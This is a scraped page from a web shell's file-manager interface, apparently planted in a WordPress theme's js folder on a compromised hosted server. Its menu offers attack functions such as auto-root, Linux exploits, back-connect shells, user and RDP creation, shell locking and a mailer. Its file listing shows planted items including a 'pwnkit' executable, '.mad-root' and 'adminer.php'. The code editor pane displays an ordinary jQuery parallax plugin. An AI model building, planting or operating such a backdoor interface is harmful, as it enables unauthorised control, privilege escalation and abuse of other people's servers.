Linux webm006.cluster131.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64
Apache
: 10.131.20.6 | : 216.73.216.137
Cant Read [ /etc/named.conf ]
8.0.30
neuschi
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
neuschi /
www /
wp-content /
themes /
moesia /
js /
[ HOME SHELL ]
Name
Size
Permission
Action
.htaccess
127
B
-r--r--r--
.mad-root
0
B
-rw-r--r--
adminer.php
0
B
-rw-r--r--
carousel-init.js
612
B
-rw-r--r--
customizer.js
11.62
KB
-rw-r--r--
html5shiv.js
9.95
KB
-rw-r--r--
image-uploader.js
1.19
KB
-rw-r--r--
imagesloaded.pkgd.js
26.02
KB
-rw-r--r--
imagesloaded.pkgd.min.js
6.79
KB
-rw-r--r--
jquery.fitvids.js
3.27
KB
-rw-r--r--
jquery.scrolly.js
2.4
KB
-rw-r--r--
jquery.sticky.js
5.57
KB
-rw-r--r--
masonry-init.js
301
B
-rw-r--r--
navigation.js
837
B
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
scripts.js
3.25
KB
-rw-r--r--
skip-link-focus-fix.js
650
B
-rw-r--r--
slick.js
83.3
KB
-rw-r--r--
slick.min.js
40.59
KB
-rw-r--r--
waypoints.js
17.53
KB
-rw-r--r--
waypoints.min.js
8.82
KB
-rw-r--r--
wow-init.js
58
B
-rw-r--r--
wow.js
13.18
KB
-rw-r--r--
wow.min.js
8.15
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : jquery.scrolly.js
/* * Project: Scrolly : parallax is easy as a matter of fact ! * Description: Based on jQuery boilerplate * Author: Victor C. / Octave & Octave web agency * Licence: MIT */ (function ( $, window, document, undefined ) { // Create the defaults once var pluginName = 'scrolly', defaults = { bgParallax: false }, didScroll = false; function Plugin( element, options ) { this.element = element; this.$element = $(this.element); this.options = $.extend( {}, defaults, options) ; this._defaults = defaults; this._name = pluginName; this.init(); } Plugin.prototype.init = function () { var self = this; this.startPosition = this.$element.position().top; this.offsetTop = this.$element.offset().top; this.height = this.$element.outerHeight(true); this.velocity = this.$element.attr('data-velocity'); this.bgStart = parseInt(this.$element.attr('data-fit'), 10); $(document).scroll(function(){ self.didScroll = true; }); setInterval(function() { if (self.didScroll) { self.didScroll = false; self.scrolly(); } }, 10); }; Plugin.prototype.scrolly = function() { var dT = $(window).scrollTop(), wH = $(window).height(), position = this.startPosition; if(this.offsetTop >= (dT+wH)) { this.$element.addClass('scrolly-invisible'); } else { if(this.$element.hasClass('scrolly-invisible')){ position = this.startPosition + (dT + ( wH - this.offsetTop ) ) * this.velocity; } else { position = this.startPosition + dT * this.velocity; } } // Fix background position if(this.bgStart){ position = position + this.bgStart; } if(this.options.bgParallax === true) { this.$element.css({backgroundPosition: '50% '+position+'px'}); } else { this.$element.css({top: position}); } }; $.fn[pluginName] = function ( options ) { return this.each(function () { if (!$.data(this, 'plugin_' + pluginName)) { $.data(this, 'plugin_' + pluginName, new Plugin( this, options )); } }); }; })(jQuery, window, document);
Close